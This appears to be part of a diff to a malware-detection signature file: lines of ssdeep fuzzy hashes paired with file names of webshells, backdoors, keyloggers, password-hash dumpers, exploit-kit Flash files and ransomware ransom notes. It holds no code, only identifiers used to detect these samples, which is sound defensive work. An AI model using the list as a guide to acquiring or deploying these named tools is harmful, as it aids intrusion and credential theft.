+192:fgnYzlMwoQBfCATWTRHeXgQ/uaZoKDdSR5rmWkGm:NZTWTeoK5J,"bt.php.223"
+192:fgGy+ChwSFHkueyEuCVBtpgItN1PlFrr/LAlIfiA7KcMktv/UHyl3mWIlIXP:ghB8VUlIfiA7Kbktv/HIS/,"aZRaiLPhp_v1.0.txt"
+192:fgGy+ChwSFHkueyEuCVBtpgItN1PlFrr/LAlIfiA7KcMktv/UHyl3i:ghB8VUlIfiA7Kbktv/0,"aZRaiLPhp_by_C-W-M.v1.0.php.txt"
+192:feVt3g5HGcAvImBQKci69iI1tioua+GZiE1V6+7midS1lBEaIHGm:f6w5Hiwi69iAiNGZi+V6+7m4H,"bt.php.205"
+192:fa+b1mJ48F4Ohc3Fuai7j7OvSdvStvShvSjdSROAl9ME:F8ik4PKdKtKhKZVI,"bt.php.162"
+192:F5qzbbjkcFna8i6xC/pycNzyqZHJw4ApLoCI8Jw:Lgfkj760/8cNu4Hq/pK,"x.php.~11~"
+192:F4Vm3sycWZ6vr48Hky+DBBO5e8VKe5fVw1wP:qWsypE+r8VVVw1wP,"bt.php.50"
+192:F4pvGAtIlk/sOmBaYgAhkuaSLBE4GsYdSBxPsM0:GTIlkOLirjr,"bt.php.51"
+192:f+2dS1DfNojL7cIfS9lx8Rp82TzH5gbX2VsVlTfua5eMw:f+MofN8R17Vs7fs,"bt.php.180"
+192:ezytNd0G9acLjwPXihlKqqiOSEqqRp6sXZMgCCK3/nvpJq3pK:KE++fqVMG4,"tuo.aspx"
+192:EZq/2wRlZD7svD79ARm1AHmYT2fPlAOmHZuaYOApm1WIEdSh+M6LXgGm:3/8PBgB1OtO,"bt.php.216"
+192:extWK0TiZ2xH3LicL0GNXmyCyAP8kUIGzsUyHAy:itWzTmmXhLbtRCythtz9yHAy,"bt.php.8"
+192:EUTa0DWWa3T6jFDzC8p6RWxU6GFDkGIi2wX6DOW5TT6UWsrFbkSmbBdSy6YAYCaH:EMhI2X3tbkSmR,"customize.asmx"
+192:eSz/J5vvXOIpNHt6vEquXdm9tQPDeQPVmYBZmLD1Uk5wsED+dqI9M:eSzx5vvX7pNHt6vEquXdm3QaQtmYBZmK,"Login_Account.php"
+192:Eq8FsRvaCGMd0rPbTQJfgAExYNkma1cji1HxVSfsko5YjcMFyHJabKPssE/RowS3:EqWsJVSv2gAFaef0YjfypKJ3lq,"shellbot.pl"
+192:enJZoQIfrmKRT+bLWZG+LNKPcUI/7Ku08ALPm5WBy/u1BrbeSx9btBOynRXIWGn9:sodT+9+LNKPcxGu08ePUu1BzNC9,"rss.gif.1"
+192:E+MK3jjKt6w1yMwkQuaTN1n4V52dSVDx9ZMw:EttsS0P4rMe7,"bt.php.79"
+192:emAvO5NXRQ+wyUhrlIu/PvUrh+CyxgNJkXSf5HI:SO5PQ+wyqrl9P8rh3KgNJhftI,"2016-06-21-EITest-CryptXXX-decrypt-instructions.html"
+192:edSAkvRUKRKBy1G11sBmFYuaIx3eY5CGkHTpySGm:UGRJKdzx3Dqh,"bt.php.225"
+192:E2HZkQFZbGu49AC/9ArX9Aw5yzxE/l4zk5+pPDiCWUv5jiCVX1+h4XCyBAKR3zPK:/FsSNKYak5+pPDDWUxjrDXs,"Keylogger.ps1"
+192:E2HZkQ6yTZ6Gu49AC/9ArX9Aw5yzxE/l4zkLAmOwPDiCWUv5jiCVX1OhNNCyBAKW:/pT9SNKYakLAmdPDDWUxjrDWm,"Keylogger.ps1"
+192:DzN8dt8+iHp/QGu1pVMRYBo8om7I1vvgHGntZSZ:HCdt8ldI1GdR1G,"audit_null.c"
+192:DY5jStkCFZFkKstRa1g02xS7u1Z8ipjdYhf9ds0sPIInUC/BMgendngQkW8QAU3g:DY5janx0Rig5xJx52FRsBU0ipgFHF3xR,"b374k-mini-shell-php.php.php"
+192:+dXVEnIws/Zs3J4xiuGaCe3WbafrV0viio+S407kcmU+kmDRkPF/pyBFw7FJf6+:mXVEIws/Zwde3Wb6JeiiV9kgiPgMF3,"telnetd.pl"
+192:DXG9aMqMNLzgXG9aMqMNLzgXG9aMqMNLzgXG9aMqMNLzE:wrNZrNZrNZrN8,"2sinlesspleasure.com.js"
+192:DWVLITr8S1sacyZVi688n6kTv50mI3jdMMZCa:yK8wsGViF+6wDI3j1Zn,"bt.php.86"
+192:dWb2waboI1+sGdhZ+DTOzLVHm8nTPJmeqxNgKPbN:d5,"VirusShare_2db354515efd03412a0ea469d375e859"
+192:dw6/36Sin0yhvn04iXH0EtZA0TGSqHhyMxpYDyfjbLh:iT4IjbF,"album.php"
+192:dua6BNR/h9MGAkGs7asBSNbJrgN39GBLCwU81A:dfkNR5714nrgN39GB+wzA,"bt.php.165"
+192:dRn/kyO9pOUObM3KjJhiwPi3U7NWMiVmszhg7UVM2Zokuohs1oFhUyDeLT+XLXIh:dRn/kr9HKjJRPaUYx+cmK3/kOTiN,"redirect.asp"
+192:DOwTHf2cLQ2LT75rwhN1R8mqvHbhGHhc5MxmM3bPtyJ9j/W2qbVrnkp50lOxk28H:BTwX2BBw2UHmu,"co.php.001"
+192:dMropoUvRxi2ey3CMKaYU7klMr7Ij1ODqT2sHHFXnUx/n7sLHlNg0GM9L7W3LGL/:dMropX5IAsDqMlExWLL7CLGL/,"2016-03-04-ksvi.co.kr-swfobject.js.txt"
+192:dKSLpbDe98BEsnEDbVK0VZLIcWlPUl79AkNw6Jyk+NdjJ:dKG8rMwVKoFl2kNw6B+7J,"bt.php.26"
+192:dkdSZG8oLohJREFERITxuajrvHaFMr3KtIPrLur4cMo:QbQb14rvHaOr3Kt0ucS,"bt.php.43"
+192:DJLG8JYX+d/rTIXT8iltAhlnBQiEz/uyq/unFfpXQOas4aeNDjqhzy9rNqKqwXEf:DBG8Jt/0FAznBiK2FfdopH5L50w0f,"c0derz shell [csh] v. 0.1.1 release.php"
+192:DIiHOwSOVPpYV2Tua3+pX/z4fdSfsS11ChtmLCGm:xH8Oq1/zKZSjCzmA,"bt.php.226"
+192:DhqlIcRMHTzj8yJJzB5B2llsxYwwY+OrUMUfNG/6ZZL3iAyc7OsAG1ABUWc1oAAb:z,"2016-07-19-Afraidgate-Locky-decryption-instructions.bmp"
+192:df8NTnyR4CIClnkM+SGXurNSMOcwuaW+oPxunyVdSFsbUnUOdZi9IGm:da2SMnHPxuyH9bUnUOdo4,"bt.php.217"
+192:dEc316vU0yatoNLGYSQRYebAUFD4iRQfjz60aRNbvPrYLD:d9gvjQLGSAycjzwRNbvsLD,"2016-01-28-Angler-EK-CryptoWall-INSTRUCTIONS_59310C73.txt"
+192:dCVU5YRFZ3tOuSy2Fn7HDm37OZ0uvMbHfMf7+eeNwy89bowi7pc/7CXuoMzN:pYRFp0xlTDmUDsHkjYl7pcTCXlMx,"2016-04-13-pseudo-Darkleech-script-returned-from-rbedfqo.hopto.org.txt"
+192:dBEPPtg47SYU6MYxmwbtGu0PaFL3aKDsXxB0XiEeaXvQztYz0Q1oggi974PQHIbY:dSt3TxNbEuS2Ck30ZZGKDOeS,"inc2.txt"
+192:D9gXldjwIelIxA64wozz/D6y0nCBsF18W/R0iNejNxebohBxy13lk6:D2XlhwIjA64wozz/D6y0nCBsF18m8jbw,"conn.jsp"
+192:D4uHoGvi++sA1HrhMsIH1dhMswz3BrcF3FMkSYwwSfsB+r4NgmQFXJGU9CkhuswB:D4hyOFFXtFSoGHM85,"index.php"
+192:D3l71VzONAE8N/ahGxxngrtT4R00Aib2huf1cfOSArC2I:D3Z1cNyN/ZxxGZPOixAi,"phpterm-v0.3.0.php"
+192:D19HHeCgK2/JJlbmYdoEP27U+xw7TAojP/05POUdrpPNwKE3Wk6Je:Jh+lJLiYCoew7T1/KPOUdpPuKE3WLe,"2016-05-28-and-31-KaiXin-EK-flash-exploit.swf"
+192:czEqqG9a46dqkDq36avmHKT//vpJ+tI8N:Evq+ldua6aC,"mssql_mysql.php"
+192:cYNWtqGGDYIobJfxIvistSVIxD6sYS8VtI8qRbmwfs:HNWBfSZfRfs,"config.root"
+192:CyibXXKC1u9rudrWCv5DrCVCfnf2uv5AMLMt2iwLTgHuj97HCLs0AZrso5mnlbUa:Cyi7KWrF5AinuuvOMLMt258u97io0jlP,"injektor.php.83"
+192:CyibXXC1u9AkldrWMv5trCVCfnf2uv5AMLMt2iwSnNLybKt3J1VAWar4VBUa:CyijWUHrzAinuuvOMLMt2C4bIZHMr4XP,"injektor.php.84"
+192:CyibXsq1u9dDt1drW5v52rCVCfnf2uvLLAMLMt2iwJppjcMAA6KExU7:CyiQuUJXCwAinuuvL8MLMt2ff2KEx+,"injektor.php.88"
+192:CyibXjVC1u9rt1drWsbv5s4rCVCfnf2uv5/MLMt2iwvvFLclpVSyOAszmtCU7:CyiXVWGXHPAinuuvRMLMt2tt+jfOaC+,"injektor.php.74"
+192:CyibXjqC1u9dDkldrWjlZv5jlWrCVCfnf2uvLLAMLMt2iwSAUwlbcufHSAjl0lbK:CyiXqWUgHYSAinuuvL8MLMt2cz/uq8kq,"injektor.php.77"
+192:CyibXji6C1u9dDudrWmv5nrCVCfnf2uvK7AMLMt2iwEMgPOpOGfJAUeBvUa:CyiXi6WU0FtAinuuvKsMLMt2KMlYGRKP,"injektor.php.87"
+192:CyibXj+1u9dDudrWbv54rCVCfnf2uvKxLMt2iw4zJ8jotXuLAHHczQUa:CyiXyU0cqAinuuvKxLMt2lotUkP,"injektor.php.70"
+192:CyibXb1u9At1drWO+v5OPrCVCfnf2uvK7AMLMt2iwsPMeivnu9YkHAOQaYkbBVU7:CyiddXKIAinuuvKsMLMt2wQgkEV+,"injektor.php.90"
+192:CyibXaa1u9rkldrWdRv5derCVCfnf2uvLLAMLMt2iwXyML8Tcg0iOAd6HQ7uxaU7:Cyiu+5HUuAinuuvL8MLMt2V8WHkuA+,"injektor.php.79"
+192:CuGkZQzNQcpZ8ua1NCPdS5AvgTQq5R6dUSYVtMM:s4cjsCF9vgTQq5QXYV7,"bt.php.174"
+192:CrljRcFV6xZirI8luz8GGAXICEHjP/9PFEJTQ8AVEsI803:CRjeFV6arISRtCEb/RP8A6sI7,"bt.php?"
+192:CLgyXGVt1GxH53B3hT89uzIcztQzJ6ziGxUmcgVxFuBDwFNwEH29lyQlHUHpE+3S:1v1GxZ3b4QL4wkSk8dE4QGNB6kUn+nuZ,"Ajax_PHP_Command_Shell_by_Ironfist.v0.7B.php.txt"
+192:CLgyXGVt1GxH53B3hT89uzIcztQzJ6ziGxUmcgVxFuBDwFNwEH29lyQlHUHpE+3c:1v1GxZ3b4QL4wkSk8dE4QGNB6kUn+nuR,"Ajax_PHP_Command_Shell.php"
+192:c+kFQ/G/L+Znpg1iFEmm+DLfTjnSs977u:c+qzYpgMFEmm+DXeI6,"bt.php.199"
+192:cHrNPmwKZEK+jVMrpmdh2uapxMk+3dStEE2MM:cZFKZEKBmHOMZ/,"bt.php.158"
+192:cGx82yOcGbHhH5HCH7HllTjgFHFIFiF5FYY10TCXvIL4zSN:k2ytGbHhH5HCH7HbgFHFIFiF5FDcIvrE,"vmsplice.txt"
+192:cE3n4Sid2qEoRS/SCyiMERUSXyBOXAziruvyknyZJGJuy8nZYof3rnjXlXgX9Xst:cWiquEyn1MQEYoTj1QthmV,"jspShell.jsp.txt"
+192:+CCZTQS3vFnn1Z2S10dZD+OKGuzq3+rg9g+:+rQS/Z2S1sZpFuu3wgF,"bt.php.82"
+192:CaNf3LMcP/5PGFNTDGFbDAYuaR0HzBqMdSdlHxOBXMo:C/KsY0zrw0,"bt.php.126"
+192:c5rVir3pzyFJFieT0q9DY+c5G3II3zZE0oguQVTgpElW1Fzmdg9zqXzz67KIlf7:cqr3pzyJZQqhYt+OtHMFQ1FHEXP62K7,"Delivery_Notification_00268768.zip"
+192:Bzenw2N3Txws8fLpJQ8kLLtJknOMLh9Fej:on51STpJDsLsn1hSj,"2016-02-26-TeslaCrypt-Decrypt-instructions-after-hscteam.com.html"
+192:BxY2gsptTwhOttncMS78T2CBJZLq6Q1yH9+dnkV:A2gspuhOwYTv1vQYdKnq,"a3416f15f53fcdfbd3469979f1535eb0_php.txt"
+192:bWIlIXwoyRvVNF/Rk6+zIS8EaQgmEAnjYQYnjOGIj2a8WIlIXn:aISL6/SdPwojYQgjOn2eIS3,"Aria_cPanel_by_KingDefacer.v1.0.php.txt"
+192:+bvyaxkdNp1Qauz8EzksLkE2rfw+RNedSPGdsIzulJj6Oym3GWcEn:4xgp1Qac8EzvkEIIcQdxDSlJZ2W5,"fb802e596769fc200247a914d00492d2_php.txt"
+192:/bvyaxkdNp1Qauz8EzksLkE2rfw+RNedSPGdsIzulJj6Oym3GWcEf:Dxgp1Qac8EzvkEIIcQdxDSlJZ2WB,"fb802e596769fc200247a914d00492d2_php.txt.orig"
+192:bvsPpgiayHeP1PISCyA13qhyOtEjZmlJRLOc2/N46pM0U+R:bvLRa1pG7LOc2/N46pMvw,"SaiProbe_v1.0.php"
+192:bvGV8IpqepBaPlco8g+PXJsJAxyVJVsud2CQ:bGDIe5o8HR9AvuudY,"bt.php.191"
+192:bO+dklh6PGoRcaBpJMSrnLxuOc33/a6uslCnrQ:bRd4h6PGtaB1LLIva4d,"bt.php.102"
+192:BmAE+1xtB0i3axIONzuYjwPhqRcAdNi9Dp78ROv:m+190i3auON3jshq6cNi958Av,"2016-06-30-EITest-CryptXXX-decrypt-instructions.html"
+192:BJeJ+/ikdSltB55FsD6OWuaDONOjohOtMA:f7F4ojcFP,"bt.php.142"
+192:bJCPle/eTqTVfDVuVNulVNkObV56GVOiaavVlQFI63v8I6gRNGH8Sn+bJaQV9Yai:1CP4eqhZgENkO5FZtGi63vv6YNF+yysW,"reDuh.php"
+192:BhPju/McEn8a5WcXaXkei/ReFmcobu/ZMGSyrs1IKLkj:X8dMujiZeoNbuBBrs1IK4j,"RemExp.asp.txt"
+192:BfPYiQA5CkOVUy/tRdmOEreg84c+NvwqmrZNP+hcnT2C++X0C+wQsyGLxqh1:pPYRAFOL/jdu8/awqy2ITH+bCjQE141,"TrojanWin32.Duqu.Stuxnet.zip"
+192:BfKQ/LRYWufhxBjigOMCS1YDxYxjEsQoT1HwJERVDjdv94e0XcLLP+2884Rpv2Uk:BfKURYWufhxBGgi8YTgL1zL7g8u35Iw6,"scane.txt"
+192:BF/0ZvTqaEuRx64XlzHu+XZopWlQNcUoZoO/eHd3MuxpyrY4RlY6:ktrRx64XlTuAZopWqNcUoZh4d3Muxn49,"2016-07-25-Cerber-decryption-instructions.html"
+192:BF/0ZvTqaEuRx64XlzHu+XZopWlNr2/rwriZrkUoZoO/0Hd3MuxpyrY4RlY6:ktrRx64XlTuAZopWOtaUoZhed3Muxn49,"2016-07-05-Cerber-decryption-instructions.html"
+192:BeXqtCtcX+mUbQwVFc3BQm0eqMmdaWoFuRBDHLacELMGgss1dImgFxGIVOt//dP:BIrtEU08S0J9aWoKBTLGSp3ImLIgV/1,"icesword.war"
+192:Be1vUz5+cabNdOoff3tkP+nP+xzBNWumcP+xzBNWuAP+vzY1EU/S23TMi:Be1vPNowQNWumcQNWuAXT1,"objects.py"
+192:BAztscEa3Dfr15gUiEUGTOA1/4hLDttXKAvhd9wUbetSOHnlLgWzhkTaEFX:WzdxCPEU2Khd9wUbetB1guEF,"MyShell-v1.0.5.php"
+192:b5FG4Kl3hKQ+0Uzw7s7iZB7InocVceQexKWUJs7iwghvHxf7v6d+21dCNAGYm:b/4MQ+47s7iLUVPwC7iwghJfTr21AEm,"smtpd.py"
+192:awg7kSqXA/o2aGTKjiQqkaPBxXyXKkiz6gWPPvpyiKhb:awg7kSaA/oLqkab6gWi,"Invoke-NetworkRelay.ps1"
+192:AvkdG/tjcP+bvgZdCj+3kEkZDO+p460eXFa/325nmN6Y5T8yljinuVXMnMtg5/Qv:AlKyYZM9BV6EmTVJUMCWNmj0TP3,"Backdoor.ASP.Ace.cv.asp"
+192:AUGW8FdSp6SdrVrcvluaMljDmFAaDmADmzJDm31F6ACyGagjuVbGMw:A9qKlKAKNKlAAMDQbk,"bt.php.1"
+192:arcKXhgr2wauaIy6PzgEdS8wskhXkBMMY:+b6PzT53kqBC,"bt.php.77"
+192:Ar0/1mtKG14bgPD6mWxEZbnZZ8vEgJUZYDD0F3AQOshR44dohY5EV0so1saY6DCe:AoiP2bgPut0zZmsgJxDDC9hRkYSXGC/m,"2016-04-21-Rig-EK-flash-exploit.swf"
+192:A+nGqjtNS5xwNLZcqCnt9zbpgYSBnAMXyZZHlG:A+fhNFAqybpgYSB/yTHY,"uoweuoiuw.php"
+192:AjcMeL8ZEDvujR0S6XOuddnH3wTvFfd8w9hDIdsGm:AjcMeL80w0SAOuddnAT9fbhX,"bt.php.236"
+192:aICGhpAT4jIOsSK4ACOTD/leHi3/md/T+GLf55Ej66Q3G7Gs:99pAGIOfe7leHi3/kT+GLf5mmJ2Ks,"32490.27760.php"
+192:aFZOeJGC6tMexuOHYbOK/cFhfsMltiqdgQCTmcYMp/:aNoQevHYb//yf53iLLT3YA,"zipper-by-DoDo.php"
+192:af7C+xsnvwUGTO8ua6AWndSdlLePOI9Qn/22FmK66R0N9pqHL/RkMQ:eA1GCNdiZi,"bt.php.49"
+192:AF6bMbj33f13PcEAHs2SKCXk3sn4A2xa60fkA4:A4bOfJqHs2SKC0S4A/60fI,"bt.php.84"
+192:aAARJUDt9wdXEsYEdXCEsKrjFLsaLBFHn1:2RCQukVprdnfn1,"2016-01-26-TeslaCrypt-sample-2-of-2-after-EITest-Angler-EK-help_recover_instructions.html"
+192:aAARJUDt9wdiEtoEZXUEmfvGsLMaLVJu9:2RCQdPrEv9T+9,"2016-01-26-TeslaCrypt-sample-1-of-2-after-EITest-Angler-EK-help_recover_instructions.html"
+192:a9xD2lbVHD0DuKeidPBGX317dUL4q+7cwVZqLEeF19Socmsm/FIv06jFFy6y8:ixKlpHYiKe4PQXl7+8q+4wfqoebIoc55,"arrow.jpg"
+192:a5/5bwRKHMs+vZ7HWb66VtMAWUIqsZms7:U/5bL+Bib3blWUIqS7,"bt.php.177"
+192:a3iyHz3/d4D1Qpoiua4RmBGdShZzn0Muv:apzXpoTm6azYv,"bt.php.69"
+192:a2BZwLM4I9BXffeyqmz0qCfRfkEbFTlbQsr2ypNCiZYEpxDymgilTrga5NQiDaYt:7ZRwqa1TNrlD3d0YEXpwecZxnn,"Get-PassHashes.ps1"
+192:a0Mv03JGKeloKb8lhyjQjz3cFSUwNFEKhSgO0CiWIlIXv:0d9oDlwjQcPwNFLhS50wISf,"Antichat_Shell_v1.3.txt"
+192:a0Mv03JGKeloKb8lhyjQjz3cFSUwNFEKhSgO0CG:0d9oDlwjQcPwNFLhS50v,"Antichat_Shell_by_Grinay.v1.3.php.txt"
+192:9uvesoiPQ+knomouaAhDmBZI4EymRmQmHlHVIdSNmG/8xMk:9usUQxgB+U36Z,"bt.php.63"
+192:9qRaHID7MJwJg0Pjz5Sz5XcG5zYMWcWmB:EOkyGg0PgcG5zYMW/E,"update_wjg.php"
+192:9Ney1RZR0jWYdFOcjG+mXHgQZUNey1RZajmYd+NeHPu:zJYHOyG+ejZQHY3vu,"sosyete.php"
+192:9Ney1RZR0jWYdFOcjG+mXHgQZUNey1RZajmYd+NeHPKWIlIXn:zJYHOyG+ejZQHY3vpIS3,"sosyete.txt"
+192:9M7GodSV8XSdjX7pYOXd0P9uan9CqlvqIuIi3/wBpqrqNbqyxkGm:kI5+q4Oucd,"bt.php.204"
+192:+9J4XyIAyoGpP5yxMvkRJ3t2tTIqkvMpyabdRIQ:+HiOYSYLP,"Check-VM.ps1"
+192:9IlQyJ6FVVejqEXT+wEJhQlv3vyREBZM140Kdny/4s2cSdN:8QyJI8jqEXQhQ1yGsU/,"2016-03-29-text-from-qtiipqeyb.hopto.org-with-pseudo-Darkleech-script.txt"
+192:9drBfilhbQZk5O1He26XsxBhg3YpYDyWHWq2RzLji0eFW7J+zP:9GlBRoRuw3j3eFos,"sep16-5.txt"
+192:8zw9Ex81QRZPYrVii2ut+j+/SlrfVrttqLgvZO43/dAQtKEnIZIgud/ONKEiziQY:8zxD9OQZiLqZO43lAQt/ZgGEv,"myshell.php"
+192:8sZExhXQuGJ/jdSlJK+H70kldBwZXLgjC6raF35cPnL1yoVzvbBvZNcBbjc+M0ND:8n2J/jdSlJKy70kldBwxLgjC6raF35c2,"arquivo.txt"
+192:8paGbnXdSNasZBIKU5okHWWkuaealwkEEQMg:GN1yIvNaKUO,"bt.php.35"
+192:8Orp8VTR3r3BaU/FWtD8GJXmgc3dwhWsM5W/8Ao9CdKjpIILXX8UItSe6D5c57:briVTBDB9NWv5cCq5W9tqpFLX8UItY5q,"all_method.cpp"
+192:8OMUhVS9yXlO5EAGWBYfFbM/DOhHHvGJRrBmDBkckZl4sGm:VMwXo5EAzBeK/DeuRwDd+,"bt.php.209"
+192:8MqgzJUQCnWcn7S5yqagscLNs41ITcKt0qqL4ACb49PEXtT:8MqAJ2Wc7S5yq06UtiLqbQEXtT,"proxy.rb"
+192:8mAh+V5DdgK+m+fFpquVThubvwiKRGbvSXKRJR+:a+VjgK+mGFppT0bvVSGbv/Rv+,"2016-06-23-CryptXXX-decrypt-instructions.html"
+192:8IiQuEzJ/UKY5ZuuavE4iiQ9dSp4VD8/UWdd8Mo:HwWliXlD8/UWdw,"bt.php.176"
+192:8DzsVHkmjOL5BtqMUtWSPEGMsC2oeImURl3:czspbWSPEzrPmUT3,"bt.php.145"
+192:8cXUkQcMEtZ5Gbnmay/mpScZ+JvDiCWUv5DiCVXVn8Bdk4lSNoiERU4YEtbKRiaQ:f4SKbFZ+JvDDWUxDrjnb4DYEtWCd,"Execute-OnTime.ps1"
+192:8CrPULkISjdSNZWzbbn3ZpVs7eoJsw76xQuaoUo0ZN2M0:8gakIGhLppE37+P2ZG,"bt.php.148"
+192:+7zjHR8MIfuazxpH7HMHtv1HILcyMOVnRjcdSZRH3zuMg:mzTixpH7HMHLHIYyJnw+HY,"bt.php.105"
+192:7tVnRmFT5fthsSB5SehGJ0vGC5bqXVl7kMVC:7HRUT6SuC5bqXVlIMVC,"php.jpg"
+192:7PrRJUPDrhEULSCIr+0teS84pcpiEqYr3jfYpsjc:7PrjU7rdIr+xS8sKqYPYpsw,"2016-05-18-CryptXXX-decrypt-instructions.html"
+192:7m65OdSoKin63SJ3Sp3SaxiF3SUUyvz6OHxvB1YWWOk5E:a65ELECJCpCuiFCUTz6Oh,"rock.png??"
+192:7/j7wfVqv7gsAHPuX8Mc4BLSakPlKU7U6r8sUxDJh7Ig0S6vI:7r7wfugfHmsMc4BktKUbo/JhF6w,"ice.jpg"
+192:7hQyK2aOJ2QV40WWgtUwdzF8R6IW006FFvGIkLlc5YiJ6XDW5Nn/UWsrFPWmbBdZ:7IOLT2Zr8kPWmGB8,"global.asax"
+192:7b4MJp7HjQOSVs2A5hAIAdAOaoK00MC702q:7bl7DLSK2yhRMzK705,"PhpShell-v2.0.php"
+192:72hBOO43oWJkFTtZhUQxtRMhc9wV7laVnkcUXkhN+MEHyk93ia2T0:72hBH43FETtZhUWTMhc9wV7ILUXCYnHj,"Out-EncodedCommand.ps1"
+192:6rSAZfXAygJua1gBIGoJ/XP9idSd9PgMQpj:Kf5XyGMfF426,"bt.php.29"
+192:6oCz+OvzTI0/eqAJtDFXAVJDs3tjumE5f3UeN7u:6viOg0/ejnFX+JDEFxKN7u,"2016-07-22-page-from-chromechurch.com-with-injected-script.txt"
+192:6HjKL8Yqc7KQ81AppUO4L1pc4BpwHppQpNppUY4e9p0pwHVpQpa1yRb91ddqIbpK:E,"2016-07-27-Afraidgate-Locky-decrypt-instructions.bmp"
+192:6dIjIMSrXljGgr5qmReKAsuLyHrWbv2K7pUGkMVkB6H3xiv:UgyRjL3fH0NUCA6HQv,"formatted.gateway.phps"
+192:6dcOXVUdJsLjqbppolYiwEM9wsUXPeyqPT9oqhpCg:6dpGFv5ZPpoesg,"EasyTar.class.php"
+192:5xp9DeT//hwQja6SjQyrweUMvcvsuo6lhqDijE:5xpVe7/JSjQfeUC4oVDiI,"2016-05-25-CryptXXX-from-Afraidgate-Angler-EK-decrypt-instructions.html"
+192:5w34JPdD8ynqjqvJTURLkJLSpCajGjV/KwPAVPdkUCYt9:5wonD8ynwq+R4JLeeRKwSlkUCS,"bt.php.72"
+192:5OoVdSNO8voya1oXKAAIfM11cStwdcTChQODEuatMs:MOQOqfZXLDW,"bt.php.166"
+192:5n0/WgWjuI+8tNIV/up40jSA+jmfewe2PBDnAe91iAYii95MmNyY7u5WarF7Jpf:50/WgWjx+8tNIwubmO2JDAe9MpiCm8kp,"VBS.Win32.Vabian.zip"
+192:5a7wp1RQQbuh25v2vibAyJEjnnjQs+RaN9atZE4f7w:5a7wp1RXiQ5v2vibAyCjnn8s+RaN9abM,"mail2.py"
+192:52PAlV6s6T6s6Msd0x2Qjv3uDysEtbu84FVkpzdAby1cR6:52Pxsy2ov3uDysEtbu84FV4zdAby1cR6,"Chropper.java"
+192:4ZHjKL8Yqc7KQ81AppUO4L1pc4BpwHppQpNppUY4e9p0pwHVpQpa1yRb91ddqIbi:4R,"2016-08-18-Afraidgate-Locky-decrypt-instructions.bmp~"
+192:4wAdSteggQhGLkNWB9sA+NWiD6K+uaQcfr8tM4:jCcghL5KsfrO,"bt.php.164"
+192:4vjMrm3V/qTYU4AQzxEQgmzi42Ge4/KH4tximsnWS6yrRgtJJkAk4Htq1q4VzFro:gjMrr4A2Bgmzh2JdYLDsna8LG,"Invoke-PsGcat.ps1"
+192:+4Uc7yQOpQAZHCin7jTP8cVEEvgiJca6q3wl:tUc79OptZHCi7jTP8cVN6q3wl,"g6priv.rar.001.001.001"
+192:4rRxu5IoyuCOpI09CVTCFjaXTZ8UAxcwxR9Sm10Ofjj:4QIoyFoIZ5UgOxvxzSm104j,"bt.php.129"
+192:4r2//vWm6EMAz8P/Az8PIAz8PoHAP6HG6MW/Xb7y2sq86njXV22cQtW2HixNCtga:4qHGw8P/w8PIw8PoHg6HLRsq86njcTQ/,"Ayyildiz Tim  -AYT- Shell v 2.1 Biz.txt.orig"
+192:4O8v0N/njhaA3MILDNVmpOSaqcqhrPTQuKcpjE:4O88NPjXLDNqOS5xPmcpI,"2016-06-02-pseduoDarkleech-Angler-EK-CryptXXX-decrypt-instructions.html"
+192:4nkk3WAoht0to+2LebAcflwr/Ak2HdMRyG9:i3WAorwobebAASryHdFG9,"bt.php.131"
+192:4igHrq4o/kdSlhFvhtNQ1rZDtE8CqtuUhgZGuaptlhohqs7h5Mg:N+md0xpy1T,"bt.php.89"
+192:4h5BKN9UnQILqkOIAtqtJethdsj1utac0wvgHNsOV1inFXVDThFNKN9TnNIkd6Rk:ya9c7dQdsjMvo9p1eR+xzso98ihL,"grelos_v.js"
+192:4ddpAgnTt2LKW4/m8nlbaU6tMZD9Y7X6gF:4BAshWrQAU6tMZD9Y7X6gF,"VirusShare_6d271a909234c8af875d459f760b891c"
+192:4dBi84sYp1CIRgPQ/knkiYnki64P9nki7r4OyIzIcIkJOk0IEKne01qJWAG5U7X5:4WGU1/N/bzJxzEWAG5U7O6,"srvc.webshell.modul.phps"
+192:4abmjLpwK4woeUGf+nA0Hmua9dSdxBQ8RxRPZMk:M/bdyW2v3v,"bt.php.140"
+192:3xlmneJEieNMgYaaAuDPI+LucB7uAWcNz7KnV7K22i+1PdsetD6LhQ5w7efH:hlmn0eNMtaAFicNmZH2i6WpqfH,"Backdoor.ASP.Ace.ga.asp"
+192:3UCBhY7GHFwZfkSplrco5MB5LPFFvpfkqS+3:k4GeFsbrco25PFHfke3,"bt.php.54"
+192:3Q4g8cGkstxVlDv9VdSDi3UQAV5V6Vt0aV28qBV6VVjEVIU+uHCpQ4g9oWqKW9nI:brcGkYDDv9VdSu3IjV6Vt0aV2dV6VVju,"module.py"
+192:3fj+dStWEEs0JYH09nOK1WCSK9roi2NnyFaSuaSxo+T17atuiMUn:vj0Bh/SH0k6WLKEny47e+T17qukn,"bt.php.57"
+192:38TV+dzTGvfhC+xsMl1AiNTKpn43IbebGYU:38k3Kf/GATf3IbeCj,"2016-03-21-pseudo-Darkleech-injected-script-from-jacobwirth.com.txt"
+192:37M0onu48bewYERdtGtLiNA08vUmS279vgt0PmyA:37h48ywLVYiBBhgICPmyA,"bt.php.185"
+192:2zROI50n7NlWtOgaONij363CM1LiqB4KcxasOIOswi0HTlUgg/jCa9KVtt9rvU:2lynZUU4ij4R1OqBtrtlUcM,"DTool_Pro_by_r3v3ng4ns.php.txt"
+192:2ZpP6KNgqVzuxrdbIGRMFHDNnsa0fIG12HtjK5j58LS9Q5inNvBSTyXQ2dGl1wG3:juzu4GRtJwGpt818pS6GnlGBbk,"test.jpg"
+192:/2uPvdS9+r3spoEx45TApIPy4dlT8uaNEqLp0rgNCWo0K5MQ:/2uPl3r3sm+4DLgEqLu8N2X7,"bt.php.103"
+192:2UcsHn/a0DWWa3T6jFklt56kf8p6RWxU6GFDkGIi2wX6DOW5TT6UWsrFbkSmbBdo:2olNI2X3tbkSmE,"Customize.soap"
+192:2L6oONLqS76AnZiS7gC3CTCnnY7pkFi2988i7RDrFy1Cbfi7BlfhiyauChia78l4:wDS7PF7LnfoEH0WrN5qsjYdSzGI/pSC0,"by Bagheera.jsp"
+192:2h5RgrZrxz+uamrsrErTdSgwwLDMnMeVBZaCH6OMo:OIr5rsrErJ17LDMnMeVf,"bt.php.47"
+192:2g/fwMhdIHbaIbQ7Y9sOq+um5KiFm+NQReCSiypUJQhJkv5ocfYzDe:ZIbad7YqFmwiFmicgjW+zy56De,"bb5.php"
+192:2cQkSI+vDmUWIFyd6KsgaSQcdObjPQh4YIWKw6JZdoJPnN5:2Nr7mUWIO6IaSACIkuoJj,"RootShell-v2.0.0.php"
